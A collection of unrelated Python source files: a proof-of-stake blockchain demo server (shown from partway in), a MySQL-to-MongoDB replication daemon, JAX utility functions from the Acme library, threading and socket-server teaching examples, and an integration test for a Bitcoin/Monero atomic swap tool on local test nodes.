candidate_blocks = Queue() # 创建队列,用于线程间通信
announcements = Queue()
validators = {}
My_Lock = threading.Lock()
def generate_block(oldblock, bpm, address):
"""
:param oldblock:
:param bpm:
:param address:
:return:
"""
newblock = {
"Index": oldblock["Index"] + 1,
"BPM": bpm,
"Timestamp": str(datetime.now()),
"PrevHash": oldblock["Hash"],
"Validator": address
}
newblock["Hash"] = calculate_hash(newblock)
return newblock
def calculate_hash(block):
record = "".join([
str(block["Index"]),
str(block["BPM"]),
block["Timestamp"],
block["PrevHash"]
])
return sha256(record.encode()).hexdigest()
def is_block_valid(newblock, oldblock):
"""
:param newblock:
:param oldblock:
:return:
"""
if oldblock["Index"] + 1 != newblock["Index"]:
return False
if oldblock["Hash"] != newblock["PrevHash"]:
return False
if calculate_hash(newblock) != newblock["Hash"]:
return False
return True
def pick_winner(announcements):
"""
选择记账人
:param announcements:
:return:
"""
time.sleep(10)
while True:
with My_Lock:
temp = temp_blocks
lottery_pool = [] #
if temp:
for block in temp:
if block["Validator"] not in lottery_pool:
set_validators = validators
k = set_validators.get(block["Validator"])
if k:
for i in range(k):
lottery_pool.append(block["Validator"])
lottery_winner = choice(lottery_pool)
print(lottery_winner)
# add block of winner to blockchain and let all the other nodes known
for block in temp:
if block["Validator"] == lottery_winner:
with My_Lock:
block_chain.append(block)
# write message in queue.
msg = "\n{0} 赢得了记账权利\n".format(lottery_winner)
announcements.put(msg)
break
with My_Lock:
temp_blocks.clear()
class HandleConn(BaseRequestHandler):
def handle(self):
print("Got connection from", self.client_address)
# validator address
self.request.send(b"Enter token balance:")
balance = self.request.recv(8192)
try:
balance = int(balance)
except Exception as e:
print(e)
t = str(datetime.now())
address = sha256(t.encode()).hexdigest()
validators[address] = balance
print(validators)
while True:
announce_winner_t = threading.Thread(target=annouce_winner, args=(announcements, self.request,),
daemon=True)
announce_winner_t.start()
self.request.send(b"\nEnter a new BPM:")
bpm = self.request.recv(8192)
try:
bpm = int(bpm)
except Exception as e:
print(e)
del validators[address]
break
# with My_Lock:
last_block = block_chain[-1]
new_block = generate_block(last_block, bpm, address)
if is_block_valid(new_block, last_block):
print("new block is valid!")
candidate_blocks.put(new_block)
self.request.send(b"\nEnter a new BPM:\n")
annouce_blockchain_t = threading.Thread(target=annouce_blockchain, args=(self.request,), daemon=True)
annouce_blockchain_t.start()
def annouce_winner(announcements, request):
"""
:param announcements:
:param request:
:return:
"""
while True:
try:
msg = announcements.get(block=False)
request.send(msg.encode())
request.send(b'\n')
except Empty:
time.sleep(3)
continue
def annouce_blockchain(request):
"""
:param request:
:return:
"""
while True:
time.sleep(30)
with My_Lock:
output = json.dumps(block_chain)
try:
request.send(output.encode())
request.send(b'\n')
except OSError:
pass
def candidate(candidate_blocks):
"""
:param candidate_blocks:
:return:
"""
while True:
try:
candi = candidate_blocks.get(block=False)
except Empty:
time.sleep(5)
continue
temp_blocks.append(candi)
def run():
# create a genesis block
t = str(datetime.now())
genesis_block = {
"Index": 0,
"Timestamp": t,
"BPM": 0,
"PrevHash": "",
"Validator": ""
}
genesis_block["Hash"] = calculate_hash(genesis_block)
print(genesis_block)
block_chain.append(genesis_block)
thread_canditate = threading.Thread(target=candidate, args=(candidate_blocks,), daemon=True)
thread_pick = threading.Thread(target=pick_winner, args=(announcements,), daemon=True)
thread_canditate.start()
thread_pick.start()
# start a tcp server
serv = ThreadingTCPServer(('', 9090), HandleConn)
serv.serve_forever()
if __name__ == '__main__':
run()
|
mymongodaemon.py
|
import sys
import time
import logging
import os
import configparser
from importlib import util
from multiprocessing import Process
from multiprocessing import Queue
from apscheduler.schedulers.blocking import BlockingScheduler
from mymongolib.daemon import Daemon
from mymongolib import mysql
from mymongolib.mongodb import MyMongoDB
from mymongolib.datamunging import DataMunging
from mymongomodules.parse_data import ParseData
from mymongomodules.process_data import ProcessData
config = configparser.ConfigParser()
config.read('conf/config.ini')
class MyMongoDaemon(Daemon):
"""Subclass of :class:`.Daemon`
"""
def run(self):
"""Runs the daemon
Thims method runs the daemon and creates all the process needed. Then waits forever
"""
self.logger = logging.getLogger(__name__)
sys.stderr = self.log_err
try:
util.find_spec('setproctitle')
self.setproctitle = True
import setproctitle
setproctitle.setproctitle('mymongo')
except ImportError:
self.setproctitle = False
self.logger.info("Running")
self.queues = dict()
self.queues['replicator_out'] = Queue()
procs = dict()
procs['scheduler'] = Process(name='scheduler', target=self.scheduler)
procs['scheduler'].daemon = True
procs['scheduler'].start()
procs['replicator'] = Process(name='replicator', target=self.replicator)
procs['replicator'].daemon = True
procs['replicator'].start()
procs['datamunging'] = Process(name='datamunging', target=self.data_munging)
procs['datamunging'].daemon = True
procs['datamunging'].start()
procs['dataprocess'] = Process(name='dataprocess', target=self.data_process)
procs['dataprocess'].daemon = True
procs['dataprocess'].start()
while True:
self.logger.info('Working...')
time.sleep(60)
def scheduler(self):
"""Runs the daemon scheduler
"""
self.write_pid(str(os.getpid()))
if self.setproctitle:
import setproctitle
setproctitle.setproctitle('mymongo_scheduler')
sched = BlockingScheduler()
try:
sched.add_job(self.dummy_sched, 'interval', minutes=1)
sched.start()
except Exception as e:
self.logger.error('Cannot start scheduler. Error: ' + str(e))
def dummy_sched(self):
"""Dummy method to keep the schedule running
"""
self.logger.info('Scheduler works!')
def write_pid(self, pid):
"""Write pid to the pidfile
Args:
pid (int): number of process id
"""
open(self.pidfile, 'a+').write("{}\n".format(pid))
def replicator(self):
"""Main process for replication. It writes entry in the replication queue
See Also:
:meth:`.data_munging`
"""
self.write_pid(str(os.getpid()))
if self.setproctitle:
import setproctitle
setproctitle.setproctitle('mymongo_replicator')
mongo = MyMongoDB(config['mongodb'])
mysql.mysql_stream(config['mysql'], mongo, self.queues['replicator_out'])
def data_munging(self):
"""Reads data from replpication queue and writes to mongo
See Also:
:meth:`.replicator`
"""
self.write_pid(str(os.getpid()))
if self.setproctitle:
import setproctitle
setproctitle.setproctitle('mymongo_datamunging')
module_instance = ParseData()
mongo = MyMongoDB(config['mongodb'])
munging = DataMunging(mongo, self.queues['replicator_out'])
munging.run(module_instance)
def data_process(self):
self.write_pid(str(os.getpid()))
if self.setproctitle:
import setproctitle
setproctitle.setproctitle('mymongo_dataprocess')
mongo = MyMongoDB(config['mongodb'])
process_instance = ProcessData(mongo)
process_instance.run()
|
utils.py
|
# python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for JAX."""
import functools
import itertools
import queue
import threading
from typing import Callable, Iterable, Generator, NamedTuple, Optional, Sequence, TypeVar, Tuple
from absl import logging
from acme import types
import jax
import jax.numpy as jnp
import numpy as np
import tree
F = TypeVar('F', bound=Callable)
N = TypeVar('N', bound=types.NestedArray)
T = TypeVar('T')
def add_batch_dim(values: types.Nest) -> types.NestedArray:
return jax.tree_map(lambda x: jnp.expand_dims(x, axis=0), values)
def _flatten(x: jnp.ndarray, num_batch_dims: int) -> jnp.ndarray:
"""Flattens the input, preserving the first ``num_batch_dims`` dimensions.
If the input has fewer than ``num_batch_dims`` dimensions, it is returned
unchanged.
If the input has exactly ``num_batch_dims`` dimensions, an extra dimension
is added. This is needed to handle batched scalars.
Arguments:
x: the input array to flatten.
num_batch_dims: number of dimensions to preserve.
Returns:
flattened input.
"""
# TODO(b/173492429): consider throwing an error instead.
if x.ndim < num_batch_dims:
return x
return jnp.reshape(x, list(x.shape[:num_batch_dims]) + [-1])
def batch_concat(
values: types.NestedArray,
num_batch_dims: int = 1,
) -> jnp.ndarray:
"""Flatten and concatenate nested array structure, keeping batch dims."""
flatten_fn = lambda x: _flatten(x, num_batch_dims)
flat_leaves = tree.map_structure(flatten_fn, values)
return jnp.concatenate(tree.flatten(flat_leaves), axis=-1)
def zeros_like(nest: types.Nest) -> types.NestedArray:
return jax.tree_map(lambda x: jnp.zeros(x.shape, x.dtype), nest)
def squeeze_batch_dim(nest: types.Nest) -> types.NestedArray:
return jax.tree_map(lambda x: jnp.squeeze(x, axis=0), nest)
def to_numpy_squeeze(values: types.Nest) -> types.NestedArray:
"""Converts to numpy and squeezes out dummy batch dimension."""
return jax.tree_map(lambda x: np.asarray(x).squeeze(axis=0), values)
def to_numpy(values: types.Nest) -> types.NestedArray:
return jax.tree_map(np.asarray, values)
def fetch_devicearray(values: types.Nest) -> types.Nest:
"""Fetches and converts any DeviceArrays to np.ndarrays."""
return tree.map_structure(_fetch_devicearray, values)
def _fetch_devicearray(x):
if isinstance(x, jax.xla.DeviceArray):
return np.asarray(x)
return x
def batch_to_sequence(values: types.Nest) -> types.NestedArray:
return jax.tree_map(
lambda x: jnp.transpose(x, axes=(1, 0, *range(2, len(x.shape)))), values)
def tile_array(array: jnp.ndarray, multiple: int) -> jnp.ndarray:
"""Tiles `multiple` copies of `array` along a new leading axis."""
return jnp.stack([array] * multiple)
def tile_nested(inputs: types.Nest, multiple: int) -> types.Nest:
"""Tiles tensors in a nested structure along a new leading axis."""
tile = functools.partial(tile_array, multiple=multiple)
return jax.tree_map(tile, inputs)
def prefetch(iterable: Iterable[T],
buffer_size: int = 5,
device=None) -> Generator[T, None, None]:
"""Performs prefetching of elements from an iterable in a separate thread.
Args:
iterable: A python iterable. This is used to build the python prefetcher.
Note that each iterable should only be passed to this function once as
iterables aren't thread safe
buffer_size (int): Number of elements to keep in the prefetch buffer.
device: The device to prefetch the elements to. If none then the elements
are left on the CPU. The device should be of the type returned by
`jax.devices()`.
Yields:
Prefetched elements from the original iterable.
Raises:
ValueError if the buffer_size <= 1.
Any error thrown by the iterable_function. Note this is not raised inside
the producer, but after it finishes executing.
"""
if buffer_size <= 1:
raise ValueError('the buffer_size should be > 1')
buffer = queue.Queue(maxsize=(buffer_size - 1))
producer_error = []
end = object()
def producer():
"""Enqueues items from `iterable` on a given thread."""
try:
# Build a new iterable for each thread. This is crucial if working with
# tensorflow datasets because tf.Graph objects are thread local.
for item in iterable:
if device:
item = jax.device_put(item, device)
buffer.put(item)
except Exception as e: # pylint: disable=broad-except
logging.exception('Error in producer thread for %s', iterable)
producer_error.append(e)
finally:
buffer.put(end)
# Start the producer thread.
threading.Thread(target=producer, daemon=True).start()
# Consume from the buffer.
while True:
value = buffer.get()
if value is end:
break
yield value
if producer_error:
raise producer_error[0]
class PrefetchingSplit(NamedTuple):
host: types.NestedArray
device: types.NestedArray
_SplitFunction = Callable[[types.NestedArray], PrefetchingSplit]
def sharded_prefetch(
iterable: Iterable[types.NestedArray],
buffer_size: int = 5,
num_threads: int = 1,
split_fn: Optional[_SplitFunction] = None,
devices: Optional[Sequence[jax.xla.Device]] = None,
) -> Generator[types.NestedArray, None, None]:
"""Performs sharded prefetching from an iterable in separate threads.
Elements from the resulting generator are intended to be used in a jax.pmap
call. Every element is a sharded prefetched array with an additional replica
dimension and corresponds to jax.local_device_count() elements from the
original iterable.
Args:
iterable: A python iterable. This is used to build the python prefetcher.
Note that each iterable should only be passed to this function once as
iterables aren't thread safe.
buffer_size (int): Number of elements to keep in the prefetch buffer.
num_threads (int): Number of threads.
split_fn: Optional function applied to every element from the iterable to
split the parts of it that will be kept in the host and the parts that
will sent to the device.
devices: Devices used for prefecthing. Optional, jax.local_devices() by
default.
Yields:
Prefetched elements from the original iterable with additional replica
dimension.
Raises:
ValueError if the buffer_size <= 1.
Any error thrown by the iterable_function. Note this is not raised inside
the producer, but after it finishes executing.
"""
devices = devices or jax.local_devices()
if buffer_size <= 1:
raise ValueError('the buffer_size should be > 1')
buffer = queue.Queue(maxsize=(buffer_size - 1))
producer_error = []
end = object()
def producer():
"""Enqueues batched items from `iterable` on a given thread."""
try:
# Build a new iterable for each thread. This is crucial if working with
# tensorflow datasets because tf.Graph objects are thread local.
it = iter(iterable)
while True:
items = itertools.islice(it, len(devices))
if not items:
break
if split_fn is None:
buffer.put(jax.device_put_sharded(tuple(items), devices))
else:
# ((host: x1, device: y1), ..., (host: xN, device: yN)).
items_split = (split_fn(item) for item in items)
# (host: (x1, ..., xN), device: (y1, ..., yN)).
split = tree.map_structure_up_to(
PrefetchingSplit(None, None), lambda *x: x, *items_split)
buffer.put(
PrefetchingSplit(
host=np.stack(split.host),
device=jax.device_put_sharded(split.device, devices)))
except Exception as e: # pylint: disable=broad-except
logging.exception('Error in producer thread for %s', iterable)
producer_error.append(e)
finally:
buffer.put(end)
# Start producer threads.
for _ in range(num_threads):
threading.Thread(target=producer, daemon=True).start()
# Consume from the buffer.
while True:
value = buffer.get()
if value is end:
break
yield value
if producer_error:
raise producer_error[0]
def replicate_in_all_devices(nest: N,
devices: Optional[Sequence[jax.xla.Device]] = None
) -> N:
"""Replicate array nest in all available devices."""
devices = devices or jax.local_devices()
return jax.api.device_put_sharded([nest] * len(devices), devices)
def get_from_first_device(nest: N, as_numpy: bool = True) -> N:
"""Gets the first array of a nest of `jax.pxla.ShardedDeviceArray`s.
Args:
nest: A nest of `jax.pxla.ShardedDeviceArray`s.
as_numpy: If `True` then each `DeviceArray` that is retrieved is transformed
(and copied if not on the host machine) into a `np.ndarray`.
Returns:
The first array of a nest of `jax.pxla.ShardedDeviceArray`s. Note that if
`as_numpy=False` then the array will be a `DeviceArray` (which will live on
the same device as the sharded device array). If `as_numpy=True` then the
array will be copied to the host machine and converted into a `np.ndarray`.
"""
def _slice_and_maybe_to_numpy(x):
if not isinstance(x, jax.pxla.ShardedDeviceArray):
raise ValueError('get_from_first_device should only be used with '
f'{jax.pxla.ShardedDeviceArray}, passed {type(x)}.')
x = x[0]
return _fetch_devicearray(x) if as_numpy else x
return jax.tree_map(_slice_and_maybe_to_numpy, nest)
def mapreduce(
f: F,
reduce_fn: Optional[Callable[[jnp.DeviceArray], jnp.DeviceArray]] = None,
**vmap_kwargs,
) -> F:
"""A simple decorator that transforms `f` into (`reduce_fn` o vmap o f).
By default, we vmap over axis 0, and the `reduce_fn` is jnp.mean over axis 0.
Note that the call signature of `f` is invariant under this transformation.
If, for example, f has shape signature [H, W] -> [N], then mapreduce(f)
(with the default arguments) will have shape signature [B, H, W] -> [N].
Args:
f: A pure function over examples.
reduce_fn: A pure function that reduces DeviceArrays -> DeviceArrays.
**vmap_kwargs: Keyword arguments to forward to `jax.vmap`.
Returns:
g: A pure function over batches of examples.
"""
if reduce_fn is None:
reduce_fn = lambda x: jnp.mean(x, axis=0)
vmapped_f = jax.vmap(f, **vmap_kwargs)
def g(*args, **kwargs):
return jax.tree_map(reduce_fn, vmapped_f(*args, **kwargs))
return g
_TrainingState = TypeVar('_TrainingState')
_TrainingAux = TypeVar('_TrainingAux')
def process_multiple_batches(
process_one_batch: Callable[[_TrainingState, _TrainingAux],
Tuple[_TrainingState, _TrainingAux]],
num_batches: int,
postprocess_aux: Optional[Callable[[_TrainingAux], _TrainingAux]] = None):
"""Makes 'process_one_batch' process multiple batches at once.
Args:
process_one_batch: a function that takes 'state' and 'data', and returns
'new_state' and 'aux' (for example 'metrics').
num_batches: how many batches to process at once
postprocess_aux: how to merge the extra information, defaults to taking
the mean.
Returns:
A function with the same interface as 'process_one_batch' which processes
multiple batches at once.
"""
assert num_batches >= 1
if num_batches == 1:
if not postprocess_aux:
return process_one_batch
def _process_one_batch(state, data):
state, aux = process_one_batch(state, data)
return state, postprocess_aux(aux)
return _process_one_batch
if postprocess_aux is None:
postprocess_aux = lambda x: jax.tree_map(jnp.mean, x)
def _process_multiple_batches(state, data):
data = jax.tree_map(
lambda a: jnp.reshape(a, (num_batches, -1, *a.shape[1:])), data)
state, aux = jax.lax.scan(
process_one_batch, state, data, length=num_batches)
return state, postprocess_aux(aux)
return _process_multiple_batches
def weighted_softmax(x: jnp.ndarray, weights: jnp.ndarray, axis: int = 0):
x = x - jnp.max(x, axis=axis)
return weights * jnp.exp(x) / jnp.sum(weights * jnp.exp(x),
axis=axis, keepdims=True)
|
threading_mixin_socket_server.py
|
import os
import socket
import threading
import socketserver
# we need to define encode function for converting string to bytes string
# this will be used for sending/receiving data via socket
encode = lambda text: text.encode()
# we need to define deocde function for converting bytes string to string
# this will convert bytes string sent/recieved via socket to string
decode = lambda byte_text: byte_text.decode()
SERVER_HOST = 'localhost'
# tell kernel to pick port dynamically
SERVER_PORT = 0
BUFF_SIZE = 1024
ECHO_MSG = 'Hello echo server'
def client(ip, port, message):
""" A client to test threading mmixin socket server """
# connect to server
sock = socket.socket()
sock.connect((ip, port))
try:
sock.sendall(encode(message))
response = sock.recv(BUFF_SIZE)
print('Client received : {}'.format(decode(response)))
finally:
sock.close()
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
""" An example of threaded TCP request handler """
def handle(self):
data = self.request.recv(BUFF_SIZE)
current_thread = threading.current_thread()
response = '{} : {}'.format(current_thread.name, decode(data))
self.request.sendall(encode(response))
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
""" Nothing to add here, inherited everything from parents """
pass
def main():
# run server
server = ThreadedTCPServer(
(SERVER_HOST, SERVER_PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address # get ip addreess
# start a thread with the server --one thread per request
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
print('Serever loop running on thread {}'.format(server_thread.name))
# Run clients
client(ip, port, "Hello from client1")
client(ip, port, "Hello from client2")
client(ip, port, "Hello from client3")
# server cleanup
server.shutdown()
if __name__ == '__main__':
main()
|
thread3a.py
|
# thread3a.py when no thread synchronization used
from threading import Thread as Thread
def inc():
global x
for _ in range(1000000):
x+=1
#global variable
x = 0
# creating threads
t1 = Thread(target=inc, name="Th 1")
t2 = Thread(target=inc, name="Th 2")
# start the threads
t1.start()
t2.start()
#wait for the threads
t1.join()
t2.join()
print("final value of x :", x)
|
test_run.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2020 tecnovert
# Distributed under the MIT software license, see the accompanying
# file LICENSE.txt or http://www.opensource.org/licenses/mit-license.php.
import os
import time
import shutil
import logging
import unittest
import threading
from xmrswap.rpc import waitForRPC, callrpc_xmr, callrpc_xmr_na
from xmrswap.util import dumpj, make_int
from xmrswap.ecc_util import h2b
from xmrswap.interface_xmr import XMR_COIN
from xmrswap.contrib.test_framework import segwit_addr
from xmrswap.contrib.test_framework.wallet_util import bytes_to_wif
from tests.xmrswap.common import (
TEST_DATADIRS,
BITCOIN_BINDIR, BITCOIND,
XMR_BINDIR, XMRD, XMR_WALLET_RPC,
NUM_NODES,
BASE_RPC_PORT,
XMR_NUM_NODES,
XMR_BASE_RPC_PORT, XMR_BASE_WALLET_RPC_PORT,
prepareXmrDataDir, prepareDataDir,
startXmrDaemon, startXmrWalletRPC,
startDaemon, callnoderpc, make_rpc_func,
checkSoftForks, stopNodes, callSwapTool,
waitForXMRNode, waitForXMRWallet
)
TEST_DIR = os.path.join(TEST_DATADIRS, 'btc')
logger = logging.getLogger()
ID_ALICE_XMR = 1
ID_BOB_XMR = 2
ID_ALICE_BTC = 1
ID_BOB_BTC = 2
def run_loop(cls):
while not cls.stop_nodes:
if cls.btc_addr is not None:
callnoderpc(0, 'generatetoaddress', [1, cls.btc_addr])
if cls.xmr_addr is not None:
callrpc_xmr_na(XMR_BASE_RPC_PORT + 0, 'generateblocks', {'wallet_address': cls.xmr_addr, 'amount_of_blocks': 1})
time.sleep(0.5)
class Test(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.stop_nodes = False
cls.update_thread = None
cls.daemons = []
cls.xmr_daemons = []
cls.xmr_wallet_auth = []
cls.btc_addr = None
cls.xmr_addr = None
super(Test, cls).setUpClass()
logger.propagate = False
logger.handlers = []
logger.setLevel(logging.INFO) # DEBUG shows many messages from requests.post
formatter = logging.Formatter('%(asctime)s %(levelname)s : %(message)s')
stream_stdout = logging.StreamHandler()
stream_stdout.setFormatter(formatter)
logger.addHandler(stream_stdout)
if os.path.isdir(TEST_DIR):
logging.info('Removing ' + TEST_DIR)
shutil.rmtree(TEST_DIR)
if not os.path.exists(TEST_DIR):
os.makedirs(TEST_DIR)
cls.stream_fp = logging.FileHandler(os.path.join(TEST_DIR, 'test.log'))
cls.stream_fp.setFormatter(formatter)
logger.addHandler(cls.stream_fp)
for i in range(NUM_NODES):
prepareDataDir(TEST_DIR, i, 'bitcoin.conf')
cls.daemons.append(startDaemon(os.path.join(TEST_DIR, str(i)), BITCOIN_BINDIR, BITCOIND))
logging.info('Started %s %d', BITCOIND, cls.daemons[-1].pid)
waitForRPC(make_rpc_func(i))
for i in range(XMR_NUM_NODES):
prepareXmrDataDir(TEST_DIR, i, 'monerod.conf')
cls.xmr_daemons.append(startXmrDaemon(os.path.join(TEST_DIR, 'xmr' + str(i)), XMR_BINDIR, XMRD))
logging.info('Started %s %d', XMRD, cls.xmr_daemons[-1].pid)
waitForXMRNode(i)
cls.xmr_daemons.append(startXmrWalletRPC(os.path.join(TEST_DIR, 'xmr' + str(i)), XMR_BINDIR, XMR_WALLET_RPC, i))
for i in range(XMR_NUM_NODES):
cls.xmr_wallet_auth.append(('test{0}'.format(i), 'test_pass{0}'.format(i)))
logging.info('Creating XMR wallet %i', i)
waitForXMRWallet(i, cls.xmr_wallet_auth[i])
cls.callxmrnodewallet(cls, i, 'create_wallet', {'filename': 'testwallet', 'language': 'English'})
cls.callxmrnodewallet(cls, i, 'open_wallet', {'filename': 'testwallet'})
cls.btc_addr = callnoderpc(0, 'getnewaddress', ['mining_addr', 'bech32'])
cls.xmr_addr = cls.callxmrnodewallet(cls, 0, 'get_address')['address']
cls.update_thread = threading.Thread(target=run_loop, args=(cls,))
cls.update_thread.start()
cls.initialiseTestState(cls)
@classmethod
def tearDownClass(cls):
logging.info('Finalising')
stopNodes(cls)
cls.stream_fp.close()
super(Test, cls).tearDownClass()
def callxmrnodewallet(self, node_id, method, params=None):
return callrpc_xmr(XMR_BASE_WALLET_RPC_PORT + node_id, self.xmr_wallet_auth[node_id], method, params)
def initialiseTestState(self):
# Called from a classmethod, seems to poison all method calls
logging.info('\nInitialising chain states')
# Why so many blocks?
num_blocks = 500
if callrpc_xmr_na(XMR_BASE_RPC_PORT + 0, 'get_block_count')['count'] < num_blocks:
logging.info('Mining %d Monero blocks.', num_blocks)
callrpc_xmr_na(XMR_BASE_RPC_PORT + 0, 'generateblocks', {'wallet_address': self.xmr_addr, 'amount_of_blocks': num_blocks})
rv = callrpc_xmr_na(XMR_BASE_RPC_PORT + 0, 'get_block_count')
logging.info('XMR blocks: %d', rv['count'])
if callnoderpc(0, 'getblockchaininfo')['blocks'] < num_blocks:
logging.info('Mining %d Bitcoin blocks to %s', num_blocks, self.btc_addr)
callnoderpc(0, 'generatetoaddress', [num_blocks, self.btc_addr])
rv = callnoderpc(0, 'getblockchaininfo')
logging.info('BTC blocks: %d', rv['blocks'])
btc_addr_alice1 = callnoderpc(ID_ALICE_BTC, 'getnewaddress', ['alice\'s main addr', 'bech32'])
callnoderpc(0, 'sendtoaddress', [btc_addr_alice1, 100])
xmr_addr_bob1 = self.callxmrnodewallet(self, ID_BOB_XMR, 'get_address')['address']
params = {'destinations': [{'amount': 50 * XMR_COIN, 'address': xmr_addr_bob1}]}
rv = self.callxmrnodewallet(self, 0, 'transfer', params)
logging.info('Sent initial XMR to Bob: %s', dumpj(rv))
logging.info('Testing node sync')
sync_passed = False
for i in range(20):
try:
above_0 = 0
for i in range(NUM_NODES):
r = callnoderpc(i, 'getblockchaininfo')
print('BTC', i, r['blocks'])
if r['blocks'] > 0:
above_0 += 1
xmr_above_1 = 0
for i in range(XMR_NUM_NODES):
r = callrpc_xmr_na(XMR_BASE_RPC_PORT + i, 'get_block_count')
print('XMR', i, r['count'])
if r['count'] > 2: # xmr counts genesis block as 1
xmr_above_1 += 1
if above_0 >= NUM_NODES and xmr_above_1 >= XMR_NUM_NODES:
logging.info('Node syncing passed.')
sync_passed = True
break
except Exception as e:
print('Error', repr(e))
time.sleep(1)
assert(sync_passed), 'Nodes did not sync'
num_tries = 40
for i in range(num_tries + 1):
rv = self.callxmrnodewallet(self, ID_BOB_XMR, 'get_balance')
if rv['balance'] > 0 and rv['blocks_to_unlock'] == 0:
break
r = callrpc_xmr_na(XMR_BASE_RPC_PORT + ID_BOB_XMR, 'get_block_count')
print(r)
if i >= num_tries:
raise ValueError('XMR Balance not confirming on node {}'.format(ID_BOB_XMR))
time.sleep(1)
def startSwap(self, ID_ALICE_SWAP, ID_BOB_SWAP, amount_a, amount_b):
logging.info('Set initial parameters.')
btc_addr_bob1 = callnoderpc(ID_BOB_BTC, 'getnewaddress', ['bob\'s addr', 'bech32'])
ignr, a_pkhash_f = segwit_addr.decode('bcrt', btc_addr_bob1)
# After a successful swap the coinA amount will be in an output to a_pkhash_f
swap_info = {
'side': 'a',
'a_coin': 'BTC',
'b_coin': 'XMR',
'a_amount': amount_a,
'b_amount': amount_b,
'a_feerate': 0.00032595,
'b_feerate': 0.0012595,
'a_pkhash_f': bytes(a_pkhash_f).hex(),
}
swap_info['a_connect'] = {
'port': BASE_RPC_PORT + ID_ALICE_BTC,
'username': 'test{}'.format(ID_ALICE_BTC),
'password': 'test_pass{0}'.format(ID_ALICE_BTC)}
swap_info['b_connect'] = {
'port': XMR_BASE_RPC_PORT + ID_ALICE_XMR,
'wallet_port': XMR_BASE_WALLET_RPC_PORT + ID_ALICE_XMR,
'wallet_auth': self.xmr_wallet_auth[ID_ALICE_XMR],
}
callSwapTool(ID_ALICE_SWAP, 'init', swap_info)
swap_info['a_connect'] = {
'port': BASE_RPC_PORT + ID_BOB_BTC,
'username': 'test{}'.format(ID_BOB_BTC),
'password': 'test_pass{0}'.format(ID_BOB_BTC)}
swap_info['b_connect'] = {
'port': XMR_BASE_RPC_PORT + ID_BOB_XMR,
'wallet_port': XMR_BASE_WALLET_RPC_PORT + ID_BOB_XMR,
'wallet_auth': self.xmr_wallet_auth[ID_BOB_XMR],
}
swap_info['side'] = 'b'
callSwapTool(ID_BOB_SWAP, 'init', swap_info)
logging.info('Alice and Bob exchange keys.')
msg1f = callSwapTool(ID_ALICE_SWAP, 'msg1f')
msg1l = callSwapTool(ID_BOB_SWAP, 'msg1l')
callSwapTool(ID_ALICE_SWAP, 'processmsg', str_param=msg1l)
callSwapTool(ID_BOB_SWAP, 'processmsg', str_param=msg1f)
def test_01_swap_successful(self):
checkSoftForks(callnoderpc(0, 'getblockchaininfo'))
ID_ALICE_SWAP = os.path.join(TEST_DIR, 'test_01_alice_swap_state') + '.json'
ID_BOB_SWAP = os.path.join(TEST_DIR, 'test_01_bob_swap_state') + '.json'
self.startSwap(ID_ALICE_SWAP, ID_BOB_SWAP, 1, 2)
logging.info('Alice creates the script-chain lock and refund txns and signs the refund tx, sends to Bob.')
msg2f = callSwapTool(ID_ALICE_SWAP, 'msg2f')
logging.info('Bob verifies the txns and signs the refund tx and creates an encrypted signature for the refund spend tx encumbered by Alice\'s coin B key share.')
callSwapTool(ID_BOB_SWAP, 'processmsg', str_param=msg2f)
msg3l = callSwapTool(ID_BOB_SWAP, 'msg3l')
logging.info('Alice verifies the signature and encrypted signature from Bob.')
callSwapTool(ID_ALICE_SWAP, 'processmsg', str_param=msg3l)
logging.info('Creates the lock spend tx and signs an encrypted signature encumbered by Bob\'s coin B key share')
msg4f = callSwapTool(ID_ALICE_SWAP, 'msg4f')
logging.info('Publishes the script-chain lock tx.')
a_lock_txid = callSwapTool(ID_ALICE_SWAP, 'publishalocktx')
# Check that the script-chain lock refund tx isn't mineable yet
try:
rv = callSwapTool(ID_ALICE_SWAP, 'publishalockrefundtx')
assert(False)
except Exception as e:
assert('non-BIP68-final' in str(e))
logging.info('Bob verifies the lock spend tx and encrypted signature from Alice.')
callSwapTool(ID_BOB_SWAP, 'processmsg', str_param=msg4f)
logging.info('Bob waits for the script-chain lock tx to confirm.')
num_tries = 30
for i in range(1 + num_tries):
rv = callSwapTool(ID_BOB_SWAP, 'confirmalocktx')
print('confirmalocktx', rv)
if rv.strip() == 'True':
break
if i >= num_tries:
raise ValueError('Timed out waiting for script-chain lock tx to confirm.')
logging.info('Then publishes the second-chain lock tx.')
b_lock_txid = callSwapTool(ID_BOB_SWAP, 'publishblocktx')
logging.info('Alice waits for the scriptless-chain lock tx to confirm.')
num_tries = 120
for i in range(1 + num_tries):
rv = callSwapTool(ID_ALICE_SWAP, 'confirmblocktx')
if rv.strip() == 'True':
break
if i >= num_tries:
raise ValueError('Timed out waiting for scriptless-chain lock tx to confirm.')
time.sleep(2)
logging.info('Alice shares the secret value with Bob, allowing the script-chain lock tx to be spent')
msg5f = callSwapTool(ID_ALICE_SWAP, 'msg5f')
callSwapTool(ID_BOB_SWAP, 'processmsg', str_param=msg5f)
logging.info('Bob spends from the script-chain lock tx')
alockspendtxid = callSwapTool(ID_BOB_SWAP, 'publishalockspendtx')
logging.info('alockspendtxid %s', alockspendtxid)
logging.info('Alice looks for Bob\'s script-chain lock spend tx and extracts the sig')
num_tries = 20
for i in range(1 + num_tries):
rv = callSwapTool(ID_ALICE_SWAP, 'findalockspendtx')
print('findalockspendtx', rv)
if rv.strip() == 'True':
break
if i >= num_tries:
raise ValueError('Timed out waiting for script-chain lock spend tx to confirm.')
time.sleep(1)
self.callxmrnodewallet(ID_ALICE_XMR, 'open_wallet', {'filename': 'testwallet'})
xmr_addr_alice1 = self.callxmrnodewallet(ID_ALICE_XMR, 'get_address')['address']
logging.info('Alice redeems the scriptless-chain lock tx to her address: %s', xmr_addr_alice1)
